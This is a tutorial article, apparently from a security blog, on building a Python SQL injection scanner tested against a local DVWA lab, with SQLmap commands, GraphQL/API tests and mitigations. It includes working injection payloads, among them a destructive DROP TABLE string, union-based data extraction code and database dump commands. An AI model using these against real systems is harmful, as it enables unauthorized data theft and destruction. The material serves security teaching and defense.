Building a Python-Based SQL Injection Scanner: A Hands-On Guide to Web Security Testing

Introduction

SQL injection remains one of the most critical and persistent web application vulnerabilities, consistently ranking in the OWASP Top 10. Understanding how these attacks work—and how to detect them—is essential for any cybersecurity professional. This article explores a practical Python-based SQL injection scanner project, demonstrating how automated tools can identify vulnerable input points through crafted payloads, concurrency handling, and ethical testing methodologies in controlled environments like DVWA.

Learning Objectives

  • Understand the mechanics of SQL injection attacks and how automated scanners detect them
  • Learn to build a Python scanner with request handling, payload delivery, and response analysis
  • Implement concurrency and rate-limiting for efficient and responsible vulnerability scanning
  • Master ethical testing practices using local lab environments like DVWA
  • Explore mitigation strategies and secure coding practices to prevent SQL injection

You Should Know

1. Understanding the SQL Injection Scanner Architecture

The Python-based scanner developed by Ziyan Lakhani represents a practical implementation of web vulnerability testing tools. At its core, the scanner works by sending specially crafted HTTP requests to web application inputs and analyzing responses for indicators of SQL injection vulnerabilities.

Key components of the scanner include:

  • Payload generation: A collection of SQL injection strings designed to trigger database errors or behavioral changes
  • Request engine: Handles HTTP communications with target applications
  • Response analyzer: Examines server responses for error messages, timing differences, or content variations
  • Concurrency manager: Controls simultaneous scan operations to balance speed and server load
  • Logger: Records findings with severity levels and request details

Basic scanner structure in Python:

import queue
import re
import threading
import time

import requests


class SQLiScanner:
    def __init__(self, target_url, params, threads=5, delay=1, cookies=None):
        self.target_url = target_url
        self.params = params
        self.threads = threads
        self.delay = delay
        # Session cookies, needed for targets that sit behind a login (DVWA does)
        self.cookies = cookies
        # Lab-only payloads. The stacked DROP TABLE string is destructive if the
        # target executes stacked queries, so use it only on a disposable database.
        self.payloads = [
            "'",
            "' OR '1'='1",
            "' OR '1'='1' --",
            "' UNION SELECT NULL--",
            "'; DROP TABLE users--",
            "' AND SLEEP(5)--",
            "' WAITFOR DELAY '00:00:05'--"
        ]
        self.vulnerabilities = []
        self.queue = queue.Queue()

    def load_payloads(self):
        for payload in self.payloads:
            self.queue.put(payload)

    def test_payload(self, payload):
        for param in self.params:
            # Inject into one parameter at a time; the others keep their original
            # values so a finding can be attributed to `param`.
            test_params = self.params.copy()
            test_params[param] = payload
            try:
                start_time = time.time()
                response = requests.get(
                    self.target_url,
                    params=test_params,
                    cookies=self.cookies,
                    timeout=10
                )
                response_time = time.time() - start_time

                # Check for SQL error indicators
                if self.detect_sql_error(response.text):
                    self.vulnerabilities.append({
                        'parameter': param,
                        'payload': payload,
                        'type': 'Error-based SQLi',
                        'time': response_time
                    })

                # Check for time-based blind injection
                if response_time > 4.5 and ('SLEEP' in payload or 'WAITFOR' in payload):
                    self.vulnerabilities.append({
                        'parameter': param,
                        'payload': payload,
                        'type': 'Time-based Blind SQLi',
                        'time': response_time
                    })

            except requests.RequestException as e:
                print(f"Error testing {param} with {payload}: {e}")

            # Pause between requests to limit load on the target
            time.sleep(self.delay)

    def detect_sql_error(self, response_text):
        # Regular expressions matched case-insensitively against the response body
        error_patterns = [
            "SQL syntax",
            "mysql_fetch",
            "ORA-[0-9]",
            "PostgreSQL",
            "SQLite",
            "unclosed quotation mark",
            "Microsoft OLE DB",
            "Incorrect syntax near"
        ]
        for pattern in error_patterns:
            if re.search(pattern, response_text, re.IGNORECASE):
                return True
        return False

    def run_scan(self):
        self.load_payloads()
        threads = []
        for _ in range(self.threads):
            t = threading.Thread(target=self.worker)
            t.start()
            threads.append(t)

        for t in threads:
            t.join()

        return self.vulnerabilities

    def worker(self):
        while True:
            try:
                # get_nowait() avoids the race between empty() and get()
                payload = self.queue.get_nowait()
            except queue.Empty:
                return
            try:
                self.test_payload(payload)
            finally:
                self.queue.task_done()


# Usage example for DVWA. The SQLi page is only served to a logged-in session,
# so pass the cookies from your own browser session.
if __name__ == "__main__":
    scanner = SQLiScanner(
        target_url="http://localhost/DVWA/vulnerabilities/sqli/",
        params={"id": "1", "Submit": "Submit"},
        threads=3,
        delay=0.5,
        cookies={"PHPSESSID": "your_session_id", "security": "low"}
    )
    results = scanner.run_scan()
    for vuln in results:
        print(f"Vulnerability found: {vuln}")
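The time-based check above uses a fixed 4.5-second threshold, which can misfire on an endpoint that is simply slow. One possible refinement, sketched here under the assumption that the scanner first times a few unmodified requests, is to compare the injected request against that baseline. The function name `is_time_based_hit` and its parameters are illustrative and not part of the original project.

```python
import statistics


def is_time_based_hit(baseline_times, injected_time, injected_delay=5.0, tolerance=0.5):
    """Return True when the injected request is slower than the baseline
    median by roughly the delay the payload asked for.

    baseline_times: response times (seconds) of unmodified requests
    injected_time:  response time (seconds) of the request carrying SLEEP/WAITFOR
    """
    if not baseline_times:
        raise ValueError("need at least one baseline measurement")
    baseline = statistics.median(baseline_times)
    return (injected_time - baseline) >= (injected_delay - tolerance)


# A slow but healthy endpoint: the injected request is no slower than usual.
slow_endpoint = is_time_based_hit([4.7, 4.8, 4.9], 4.9)
# A fast endpoint that suddenly takes about five seconds longer.
fast_endpoint = is_time_based_hit([0.2, 0.25, 0.3], 5.2)
print(slow_endpoint, fast_endpoint)
```

Repeating the delayed request and requiring the slowdown to reproduce would reduce noise further, at the cost of more traffic to the target.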

2. Setting Up Your Ethical Testing Environment

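Before running any security tools, you must establish a controlled testing environment. The Damn Vulnerable Web Application (DVWA) is a deliberately vulnerable PHP/MySQL application built for this purpose. Run it only on a machine or virtual machine you control, and never expose it to the internet; within that boundary you can practice SQL injection detection without legal or ethical concerns.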

Installing DVWA on Linux (Ubuntu/Debian):

# Update system and install prerequisites
sudo apt update
sudo apt install apache2 mysql-server php php-mysqli php-gd libapache2-mod-php git -y

# Start services
sudo systemctl start apache2
sudo systemctl start mysql

# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
sudo chown -R www-data:www-data DVWA/

# Configure DVWA
cd DVWA/config
sudo cp config.inc.php.dist config.inc.php
sudo nano config.inc.php  # Set database password

# Set up database (enter the SQL statements below at the mysql> prompt)
sudo mysql -u root -p
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;

Installing DVWA on Windows (using XAMPP):

# Download and install XAMPP from https://www.apachefriends.org/
# Start Apache and MySQL from XAMPP Control Panel

# Navigate to htdocs
cd C:\xampp\htdocs

# Clone DVWA (requires Git for Windows)
git clone https://github.com/digininja/DVWA.git

# Copy configuration file
copy C:\xampp\htdocs\DVWA\config\config.inc.php.dist C:\xampp\htdocs\DVWA\config\config.inc.php

# Edit config file to set database credentials
notepad C:\xampp\htdocs\DVWA\config\config.inc.php

# Access DVWA at http://localhost/DVWA/setup.php
# Click "Create/Reset Database" and log in with admin/password

Docker alternative for quick setup:

# Run DVWA in Docker container
docker run --rm -it -p 80:80 vulnerables/web-dvwa

# Access at http://localhost
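Because the scanner should only ever be pointed at a lab like the ones set up above, it can help to refuse out-of-scope targets in code. The following is a minimal sketch of such a guard; the `is_lab_target` helper and the `ALLOWED_HOSTNAMES` allowlist are assumptions made for illustration, and a private IP address is not by itself proof of permission to test.

```python
import ipaddress
from urllib.parse import urlparse

# Hypothetical allowlist of host names that count as "the lab"
ALLOWED_HOSTNAMES = {"localhost"}


def is_lab_target(url):
    """Return True only for URLs that point at a local or private-range host."""
    host = urlparse(url).hostname
    if host is None:
        return False  # not an absolute URL
    if host.lower() in ALLOWED_HOSTNAMES:
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name that is not on the allowlist
    return address.is_loopback or address.is_private


for candidate in (
    "http://localhost/DVWA/vulnerabilities/sqli/",
    "http://192.168.56.101/DVWA/",
    "http://example.com/page.php?id=1",
):
    print(candidate, is_lab_target(candidate))
```

A scanner could call this check before queueing any payloads and exit if it fails.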

3. Advanced SQL Injection Detection Techniques

Modern SQL injection scanners must evolve beyond simple error-based detection. Understanding different injection types helps build more comprehensive testing tools.

Boolean-based blind injection testing:

# SQLiScanner methods, shown without the class wrapper.
def test_boolean_blind(self, base_param, true_payload, false_payload):
    """Test for boolean-based blind SQL injection"""

    # Send request with condition expected to be true
    true_params = self.params.copy()
    true_params[base_param] = f"1' AND 1=1 {true_payload}"
    true_response = requests.get(self.target_url, params=true_params, timeout=10)
    true_content = true_response.text

    # Send request with condition expected to be false
    false_params = self.params.copy()
    false_params[base_param] = f"1' AND 1=2 {false_payload}"
    false_response = requests.get(self.target_url, params=false_params, timeout=10)
    false_content = false_response.text

    # If responses differ significantly, likely vulnerable
    if self.calculate_similarity(true_content, false_content) < 0.8:
        return True
    return False

def calculate_similarity(self, text1, text2):
    """Simple similarity ratio based on length difference"""
    len1, len2 = len(text1), len(text2)
    if len1 == 0 and len2 == 0:
        return 1.0
    return 1.0 - abs(len1 - len2) / max(len1, len2)
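The length-based similarity above treats two pages of equal length as identical even when their content differs. A content-aware alternative, sketched here with the standard library's `difflib.SequenceMatcher`, is one option; the function name `content_similarity` and the sample pages are made up for illustration.

```python
from difflib import SequenceMatcher


def content_similarity(text1, text2):
    """Similarity ratio in [0, 1] based on matching character runs."""
    if not text1 and not text2:
        return 1.0
    return SequenceMatcher(None, text1, text2, autojunk=False).ratio()


def length_similarity(text1, text2):
    """The length-only measure, reproduced for comparison."""
    len1, len2 = len(text1), len(text2)
    if len1 == 0 and len2 == 0:
        return 1.0
    return 1.0 - abs(len1 - len2) / max(len1, len2)


# Two hypothetical responses with the same length but different content
page_true = "<p>First name: admin</p><p>Surname: admin</p>"
page_false = "<p>First name: guest</p><p>Surname: guest</p>"

print(length_similarity(page_true, page_false))   # cannot tell the pages apart
print(content_similarity(page_true, page_false))  # lower than 1.0
```

`SequenceMatcher` is quadratic in the worst case, so for large pages it may be worth comparing only the part of the response that is expected to change.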

Union-based injection extraction:

# SQLiScanner method, shown without the class wrapper.
def extract_data_union(self, vulnerable_param, column_count=None):
    """Attempt to extract data using UNION-based injection"""

    # Determine number of columns: ORDER BY i fails once i exceeds the count
    if column_count is None:
        for i in range(1, 10):
            payload = f"1' ORDER BY {i}-- -"
            params = self.params.copy()
            params[vulnerable_param] = payload
            response = requests.get(self.target_url, params=params, timeout=10)

            if "Unknown column" in response.text or self.detect_sql_error(response.text):
                column_count = i - 1
                break

    # Extract database information
    if column_count:
        # First column carries database(), last carries user(), the rest are NULL
        columns = ["NULL"] * column_count
        columns[0] = "database()"
        if column_count > 1:
            columns[-1] = "user()"
        union_payload = "-1' UNION SELECT " + ",".join(columns) + "-- -"

        params = self.params.copy()
        params[vulnerable_param] = union_payload
        response = requests.get(self.target_url, params=params, timeout=10)

        # Parse response for extracted data. extract_data_from_response is not
        # defined in this article; it stands for an application-specific parser.
        return self.extract_data_from_response(response.text)

    return None
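The column-counting step can be separated from the HTTP code so that it is testable without a live target. The sketch below assumes a caller-supplied function `order_by_fails(i)` that sends `ORDER BY i` and reports whether the response contained an error; both that callback and `count_columns` are illustrative names.

```python
def count_columns(order_by_fails, max_columns=10):
    """Return the number of columns in the injected query, or None if unknown.

    order_by_fails(i) must return True when "ORDER BY i" produces an error.
    The count is the last index that did not fail.
    """
    for i in range(1, max_columns + 1):
        if order_by_fails(i):
            # Failing at i == 1 means the probe itself does not work here
            return i - 1 if i > 1 else None
    return None  # no failure seen within max_columns: inconclusive


def fake_probe(i):
    """Simulates a target whose query selects two columns."""
    return i > 2


print(count_columns(fake_probe))
```

In a real scan the callback would wrap the request and the error check already shown in `extract_data_union`.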

4. Implementing Concurrency and Rate Limiting

Efficient scanning requires balancing speed with responsible resource usage. Python’s threading and queue modules enable concurrent testing while maintaining control over request rates.

Advanced concurrency manager with rate limiting:

import threading
import time
from threading import Semaphore

import requests


class RateLimiter:
    """Token bucket rate limiter implementation"""
    def __init__(self, max_requests_per_second):
        self.rate = max_requests_per_second
        self.tokens = max_requests_per_second
        self.last_refill = time.time()
        self.lock = threading.Lock()

    def acquire(self):
        """Block until a token is available, then consume it."""
        with self.lock:
            now = time.time()
            elapsed = now - self.last_refill
            # Refill in proportion to elapsed time, capped at the bucket size
            self.tokens = min(self.rate, self.tokens + elapsed * self.rate)
            self.last_refill = now

            if self.tokens >= 1:
                self.tokens -= 1
                return True

            # Not enough tokens: sleep until one has accrued. The lock stays
            # held so that waiting threads are released one at a time.
            wait_time = (1 - self.tokens) / self.rate
            time.sleep(wait_time)
            self.tokens = 0
            self.last_refill = time.time()
            return True


class ConcurrentScanner:
    def __init__(self, target, payloads, max_threads=10, requests_per_second=5):
        self.target = target
        self.payloads = payloads
        self.max_threads = max_threads
        self.rate_limiter = RateLimiter(requests_per_second)
        self.results = []
        self.results_lock = threading.Lock()
        self.active_threads = Semaphore(max_threads)
        self.completed = 0
        self.total = len(payloads)

    def scan_payload(self, payload):
        """Execute scan for a single payload with rate limiting"""
        try:
            self.rate_limiter.acquire()

            # Perform the actual request
            response = requests.get(
                self.target,
                params={"id": payload},
                timeout=5,
                headers={"User-Agent": "SQLi-Scanner/1.0"}
            )

            # Analyze response
            result = self.analyze_response(payload, response)

            with self.results_lock:
                if result["vulnerable"]:
                    self.results.append(result)
                self.completed += 1
                print(f"Progress: {self.completed}/{self.total} ({self.completed / self.total * 100:.1f}%)")

        except Exception as e:
            with self.results_lock:
                self.completed += 1
            print(f"Error with payload {payload}: {e}")
        finally:
            # Free the slot taken in run() so the next thread can start
            self.active_threads.release()

    def run(self):
        """Start concurrent scanning"""
        threads = []

        for payload in self.payloads:
            # Blocks while max_threads scans are already in flight
            self.active_threads.acquire()
            t = threading.Thread(target=self.scan_payload, args=(payload,))
            t.start()
            threads.append(t)

        # Wait for all threads to complete
        for t in threads:
            t.join()

        return self.results

    def analyze_response(self, payload, response):
        """Analyze response for vulnerability indicators"""
        vulnerable = False
        evidence = None

        # Check for SQL errors. These are broad substrings ("sql", "Microsoft")
        # and will flag ordinary pages too, so treat a hit as a lead to verify.
        sql_errors = [
            "mysql", "sql", "syntax", "ORA-", "PostgreSQL",
            "SQLite", "unclosed quotation", "Microsoft"
        ]

        for error in sql_errors:
            if error.lower() in response.text.lower():
                vulnerable = True
                evidence = f"SQL error detected: {error}"
                break

        # Check for behavioral changes
        if "SLEEP" in payload and response.elapsed.total_seconds() > 4:
            vulnerable = True
            evidence = "Time-based injection detected"

        return {
            "payload": payload,
            "vulnerable": vulnerable,
            "evidence": evidence,
            "status_code": response.status_code,
            "response_time": response.elapsed.total_seconds(),
            "response_size": len(response.text)
        }
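The token-bucket arithmetic is easier to follow, and to test, when the clock is injectable. The sketch below is a single-threaded, non-blocking variant written for illustration: `TokenBucket`, `FakeClock`, and the `clock` parameter are assumptions, not part of the scanner above, and a lock would still be needed for use across threads.

```python
import time


class TokenBucket:
    """Non-blocking token bucket: `rate` tokens per second, up to `capacity`."""

    def __init__(self, rate, capacity, clock=time.monotonic):
        self.rate = float(rate)
        self.capacity = float(capacity)
        self.clock = clock
        self.tokens = float(capacity)
        self.last_refill = clock()

    def try_acquire(self):
        """Consume one token if available; return whether the request may go."""
        now = self.clock()
        elapsed = now - self.last_refill
        self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
        self.last_refill = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


class FakeClock:
    """Manually advanced clock so the example runs instantly."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


clock = FakeClock()
bucket = TokenBucket(rate=2, capacity=2, clock=clock)

burst = [bucket.try_acquire() for _ in range(3)]  # third call finds the bucket empty
clock.advance(0.5)                                # 0.5 s at 2 tokens/s refills one token
after_wait = bucket.try_acquire()
print(burst, after_wait)
```

Using a monotonic clock by default avoids surprises when the system time is adjusted during a long scan.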

5. SQL Injection Testing with SQLmap

While custom scanners are educational, professional penetration testers often use specialized tools like SQLmap for comprehensive assessments. Understanding SQLmap complements your Python scanner knowledge.

Basic SQLmap commands for testing:

# Basic GET parameter test
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"

# POST parameter test with data
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/" --data="id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id"

# Enumerate databases
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --dbs

# Enumerate tables from a specific database
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa --tables

# Dump table contents
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" -D dvwa -T users --dump

# Advanced options with proxy for debugging
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --proxy="http://127.0.0.1:8080" --batch

Using SQLmap with request files for complex scenarios:

# Capture request in Burp Suite and save to request.txt
# Then run SQLmap with the request file
sqlmap -r request.txt --batch --level=3 --risk=2

# For authenticated scans, include cookies
sqlmap -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=abc123; security=low"
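When SQLmap runs are driven from the same Python tooling, building the argument list in code avoids shell-quoting mistakes with cookies that contain spaces and semicolons. This is a small sketch that only assembles the flags already shown above (`-u`, `--cookie`, `--data`, `--batch`, `--dbs`); the helper name `build_sqlmap_args` is hypothetical, and the sketch prints the command instead of running it.

```python
import shlex


def build_sqlmap_args(url, cookie=None, data=None, extra=()):
    """Assemble a sqlmap argument list suitable for subprocess.run()."""
    args = ["sqlmap", "-u", url, "--batch"]
    if cookie:
        args.append(f"--cookie={cookie}")
    if data:
        args.append(f"--data={data}")
    args.extend(extra)
    return args


args = build_sqlmap_args(
    "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit",
    cookie="security=low; PHPSESSID=your_session_id",
    extra=["--dbs"],
)

# shlex.join shows the command as it would be typed in a POSIX shell
print(shlex.join(args))
```

Passing the list to `subprocess.run(args)` hands each element to sqlmap as a single argument, so no shell escaping is involved.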

6. Mitigation Strategies and Secure Coding Practices

Understanding vulnerabilities is only half the battle; knowing how to prevent them is equally crucial. Implementing proper defenses protects applications from SQL injection attacks.

Parameterized queries in various languages:

# Python with SQLite (safe)
import sqlite3

def safe_get_user(user_id):
    conn = sqlite3.connect('database.db')
    try:
        cursor = conn.cursor()
        # Parameterized query prevents injection
        cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
        return cursor.fetchone()
    finally:
        conn.close()

# Python with MySQL
import mysql.connector

def safe_get_user_mysql(user_id):
    conn = mysql.connector.connect(user='root', password='password', host='localhost', database='test')
    try:
        cursor = conn.cursor()
        # Parameterized query
        cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
        return cursor.fetchone()
    finally:
        conn.close()

<?php
// PHP with MySQLi (safe)
$mysqli = new mysqli("localhost", "user", "password", "database");
$stmt = $mysqli->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
$user = $result->fetch_assoc();

// PHP with PDO (safe)
$pdo = new PDO("mysql:host=localhost;dbname=database", "user", "password");
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$stmt->execute(['id' => $_GET['id']]);
$user = $stmt->fetch();
?>

// Java with PreparedStatement (safe)
public User getUserById(String userId) {
    String sql = "SELECT * FROM users WHERE id = ?";
    try (Connection conn = dataSource.getConnection();
         PreparedStatement pstmt = conn.prepareStatement(sql)) {
        pstmt.setString(1, userId);
        ResultSet rs = pstmt.executeQuery();
        if (rs.next()) {
            return mapUser(rs);
        }
    } catch (SQLException e) {
        logger.error("Database error", e);
    }
    return null;
}
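To see why parameterization matters, it helps to run the same payload through a concatenated query and a parameterized one. The sketch below uses an in-memory SQLite database with made-up rows; the table layout and the function names `unsafe_lookup` and `safe_lookup` are assumptions for the demonstration only.

```python
import sqlite3


def make_demo_db():
    """Create a throwaway in-memory database with two sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("1", "admin"), ("2", "gordon")],
    )
    return conn


def unsafe_lookup(conn, user_id):
    # Vulnerable on purpose: the input becomes part of the SQL text
    query = f"SELECT name FROM users WHERE id = '{user_id}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, user_id):
    # The input is bound as a value and is never parsed as SQL
    return conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchall()


conn = make_demo_db()
payload = "' OR '1'='1"

leaked = unsafe_lookup(conn, payload)  # the WHERE clause becomes always true
bound = safe_lookup(conn, payload)     # no user has this literal string as an id
print(len(leaked), len(bound))
```

The concatenated query returns every row in the table, while the parameterized query returns none, because the payload is compared as a plain string.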

Input validation and sanitization:

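import re

def validate_user_input(input_string):
    """Validate and sanitize user input"""

    # Whitelist approach - only allow alphanumeric and specific characters.
    # fullmatch is used because "$" would also accept a trailing newline.
    if not re.fullmatch(r"[a-zA-Z0-9_@. -]+", input_string):
        return None

    # Escape special characters. The whitelist already rejects quotes and
    # backslashes, so this is defense in depth and not a substitute for
    # parameterized queries.
    sanitized = input_string.replace("\\", "\\\\").replace("'", "''")
    return sanitized

# Implement proper input validation
def process_request(user_input):
    validated = validate_user_input(user_input)
    if validated is None:
        return "Invalid input detected", 400

    # Proceed with validated input (process_validated_input is the
    # application's own handler and is not defined here)
    return process_validated_input(validated)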
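For fields with a known type, such as the numeric `id` parameter used throughout this article, converting the input to that type is often a stricter check than a character whitelist. A minimal sketch follows, assuming positive integer identifiers; `parse_user_id` and its `max_value` bound are illustrative.

```python
def parse_user_id(raw, max_value=2**31 - 1):
    """Return the id as an int, or None if the input is not a plain positive integer."""
    if not isinstance(raw, str):
        return None
    text = raw.strip()
    # isascii() rejects non-ASCII digit characters that isdigit() would accept
    if not text.isascii() or not text.isdigit():
        return None
    value = int(text)
    if value < 1 or value > max_value:
        return None
    return value


for sample in ("42", " 7 ", "1' OR '1'='1", "", "0"):
    print(repr(sample), parse_user_id(sample))
```

The resulting integer should still be passed to the database through a parameterized query; validation narrows the input, it does not replace binding.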

Web application firewall (WAF) rules with ModSecurity:

# ModSecurity rule for SQL injection prevention
SecRule ARGS "@detectSQLi" \
    "id:1000,\
    phase:2,\
    deny,\
    status:403,\
    msg:'SQL Injection Attack Detected',\
    logdata:'%{MATCHED_VAR}',\
    severity:'CRITICAL'"

# Custom regex pattern for SQL injection detection
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(union.+select|select.+from|insert.+into|delete.+from|update.+set|drop.+table|exec.+xp_cmdshell))" \
    "id:1001,\
    phase:2,\
    deny,\
    status:403,\
    msg:'SQL Injection Pattern Detected'"
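Signature rules like the custom regex in rule 1001 are worth testing against both attack strings and ordinary text before deployment. The sketch below replays that same pattern with Python's `re` module, on the assumption that it behaves like the WAF's regex engine for this simple expression; the sample inputs are made up.

```python
import re

# The pattern from rule 1001, copied verbatim
SQLI_PATTERN = re.compile(
    r"(?i:(union.+select|select.+from|insert.+into|delete.+from"
    r"|update.+set|drop.+table|exec.+xp_cmdshell))"
)


def rule_1001_matches(value):
    """Return True if the rule's regex would fire on this input."""
    return bool(SQLI_PATTERN.search(value))


samples = {
    "classic union payload": "1' UNION SELECT NULL-- -",
    "ordinary sentence": "Please select a size from the menu",
    "tautology payload": "' OR '1'='1",
}

for label, value in samples.items():
    print(f"{label}: {rule_1001_matches(value)}")
```

The ordinary sentence triggers the rule while the tautology payload does not, which illustrates why a WAF signature is a supplementary control and not a replacement for parameterized queries.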

7. Cloud and API Security Testing

Modern applications increasingly rely on APIs and cloud services, introducing new vectors for injection attacks. Testing these environments requires additional considerations.

API security testing script:

import time

import requests


class APISecurityTester:
    def __init__(self, base_url, api_key=None):
        self.base_url = base_url
        self.headers = {
            'Content-Type': 'application/json',
            'User-Agent': 'API-Security-Scanner/1.0'
        }
        if api_key:
            self.headers['Authorization'] = f'Bearer {api_key}'

    def test_sqli_in_json(self, endpoint, param_path):
        """Test for SQL injection in JSON API endpoints"""

        # The stacked DROP TABLE payload is destructive; lab databases only
        payloads = [
            {"value": "' OR '1'='1", "expected": "sql_error"},
            {"value": "1' UNION SELECT * FROM users--", "expected": "data_leak"},
            {"value": "1'; DROP TABLE users--", "expected": "error"},
            {"value": "1' AND SLEEP(5)--", "expected": "delay"}
        ]

        results = []

        for payload in payloads:
            # Construct JSON body with injected payload
            json_body = self.build_nested_json(param_path, payload["value"])

            try:
                start_time = time.time()
                response = requests.post(
                    f"{self.base_url}{endpoint}",
                    headers=self.headers,
                    json=json_body,
                    timeout=10
                )
                response_time = time.time() - start_time

                # Analyze response
                vulnerable = self.analyze_api_response(
                    response,
                    response_time,
                    payload["expected"]
                )

                results.append({
                    "endpoint": endpoint,
                    "payload": payload["value"],
                    "vulnerable": vulnerable,
                    "status_code": response.status_code,
                    "response_time": response_time
                })

            except requests.RequestException as e:
                print(f"Error testing {endpoint}: {e}")

        return results

    def build_nested_json(self, param_path, value):
        """Build nested JSON from dot notation path (e.g., 'user.profile.id')"""
        parts = param_path.split('.')
        result = {}
        current = result

        for i, part in enumerate(parts):
            if i == len(parts) - 1:
                current[part] = value
            else:
                current[part] = {}
                current = current[part]

        return result

    def analyze_api_response(self, response, response_time, expected):
        """Analyze API response for vulnerability indicators"""

        # Check for SQL errors in response
        if response.status_code == 500:
            if "sql" in response.text.lower() or "database" in response.text.lower():
                return True

        # Check for time-based injection
        if expected == "delay" and response_time > 4.5:
            return True

        # Check for data leakage. This is a crude keyword heuristic, so it is
        # applied only to the payload that was expected to leak data.
        if expected == "data_leak" and response.status_code == 200 and "users" in response.text.lower():
            return True

        return False

    def scan_graphql_endpoint(self, endpoint):
        """Test GraphQL endpoints for injection vulnerabilities"""

        graphql_payloads = [
            {
                "query": "query { user(id: \"1' OR '1'='1\") { name email } }",
                "name": "boolean_based"
            },
            {
                "query": "query { user(id: \"1' UNION SELECT * FROM users--\") { name email } }",
                "name": "union_based"
            },
            {
                "query": "query { __schema { types { name fields { name } } } }",
                "name": "introspection"
            }
        ]

        for payload in graphql_payloads:
            # Only the query is sent; "name" is a local label for reporting
            response = requests.post(
                f"{self.base_url}{endpoint}",
                headers=self.headers,
                json={"query": payload["query"]},
                timeout=10
            )

            if response.status_code == 200:
                body = response.json()
                if "errors" in body:
                    error_msg = body["errors"][0]["message"]
                    if "sql" in error_msg.lower() or "database" in error_msg.lower():
                        print(f"Potential SQLi in GraphQL: {payload['name']}")
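`build_nested_json` injects at one hand-written path. When a sample request body is available, a tester may prefer to generate one test body per leaf field automatically. The sketch below shows one way to do that; the helper names and the sample template are assumptions, and the generated bodies would still be sent with the request code above.

```python
import copy


def iter_leaf_paths(obj, prefix=()):
    """Yield the path (tuple of keys and indexes) to every scalar in a JSON value."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from iter_leaf_paths(value, prefix + (key,))
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from iter_leaf_paths(value, prefix + (index,))
    else:
        yield prefix


def inject_at(template, path, payload):
    """Return a deep copy of template with the value at path replaced by payload."""
    body = copy.deepcopy(template)
    target = body
    for key in path[:-1]:
        target = target[key]
    target[path[-1]] = payload
    return body


def generate_test_bodies(template, payload):
    """Yield (path, body) pairs, one per leaf, each with a single injected field."""
    for path in iter_leaf_paths(template):
        if path:  # a bare scalar template has no field to inject into
            yield path, inject_at(template, path, payload)


# Hypothetical request body captured from a lab API
template = {"user": {"profile": {"id": 1}, "name": "alice"}, "tags": ["a"]}

bodies = list(generate_test_bodies(template, "'"))
for path, body in bodies:
    print(path, body)
```

Injecting into one field per request keeps the other fields valid, so a change in the response can be attributed to a single parameter.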

What Undercode Say

Key Takeaway 1: Building custom security tools provides invaluable hands-on experience with vulnerability mechanics, but always remember that ethical boundaries and legal permissions must precede any testing activity. The Python SQL injection scanner demonstrates how automated tools work, yet professional assessments should combine custom scripts with established frameworks like SQLmap for comprehensive coverage.

Key Takeaway 2: SQL injection prevention is fundamentally about treating user input as data, not executable code. Parameterized queries, input validation, and principle of least privilege form the foundation of defense. The most sophisticated scanner cannot protect an application that doesn’t implement these basic security controls.

The journey from understanding SQL injection to building detection tools and implementing defenses represents a complete security mindset evolution. This project exemplifies how hands-on development bridges theoretical knowledge with practical application. As web technologies evolve, so too will injection techniques—making continuous learning and adaptation essential skills for security professionals. The Python scanner approach, combined with proper testing environments like DVWA, creates a safe space to explore vulnerabilities before encountering them in production systems. Remember that the goal isn’t just finding flaws, but understanding them deeply enough to build more secure applications from the start.

Prediction

As artificial intelligence and machine learning integrate into web applications, SQL injection attacks will likely evolve to target AI-driven database queries and vector databases. We’ll see the emergence of “AI-assisted injection” where attackers use language models to craft context-aware payloads that bypass traditional WAF rules. Simultaneously, defensive tools will incorporate behavioral analysis and anomaly detection to identify injection attempts based on query patterns rather than signatures. The next generation of SQL injection scanners will need to understand application logic and database schemas to identify complex, multi-stage injection vulnerabilities that current tools miss. Cloud-native applications with serverless databases will require new testing methodologies as traditional connection-based detection becomes obsolete.

Reported By: Ziyanlakhani Github – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
